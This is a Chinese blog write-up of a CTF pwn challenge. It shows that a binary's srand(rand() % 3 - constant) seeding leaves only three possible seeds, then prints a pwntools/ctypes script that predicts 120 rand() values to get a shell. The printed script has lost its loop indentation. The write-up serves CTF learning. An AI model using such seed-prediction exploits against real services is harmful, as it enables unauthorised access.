该程序是64位,开启了canary和NX保护;
所以这里先拖进ida看看:
这就是函数主体部分,可以看到开始**v3 = time(0)srand(v3)这里用了时间做随机数的种子,但之后又调用了v4 = rand();srand(v4 % 3 - 1522127470);**也就是说其实真正随机数的种子只需要看后一个srand就可以了。
而且后一个srand用了%的原因,它的种子只可能是0,1,2这三个数再减去后面那个,也就是只有三种可能。(这里是因为实际上计算机生成随机数是伪随机数是用算法得出的,只要种子一定,那么每次出来的随机数是固定的。)
所以我们只需要连续120词使得rand % 4 +1 =v6就可以getshell。接下来就只需要进行爆破了。
知道了这个,我么就可以开始写脚本了。
pythonfrom pwn import*
from ctypes import*
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','split','-h'])
#io = remote('node5.anna.nssctf.cn',28927)
io=process('./bin')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
a = libc.srand(libc.time(0))
b = libc.rand(a)
c= libc.srand(b % 3 - 1522127470)
for i in range(1,121):
io.sendlineafter(b'Floor',str(libc.rand(c)%4+1))
io.interactive()
这里的from ctypes import*实际上是在python里调用c函数,因为后面要模仿源程序中的方法进行爆破。
这里其实是已经拿到了,只不过本地没有文件所以没有flag。
这题确实很好玩,有意思。第一次遇到srand和rand这样的伪随机数函数的做法。
作者新手一枚,文章如有错误还请多多包涵。如果各位Dalao能够指出错误,那就再好不过了,红豆泥私密马赛!
本文作者:Hyrink
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!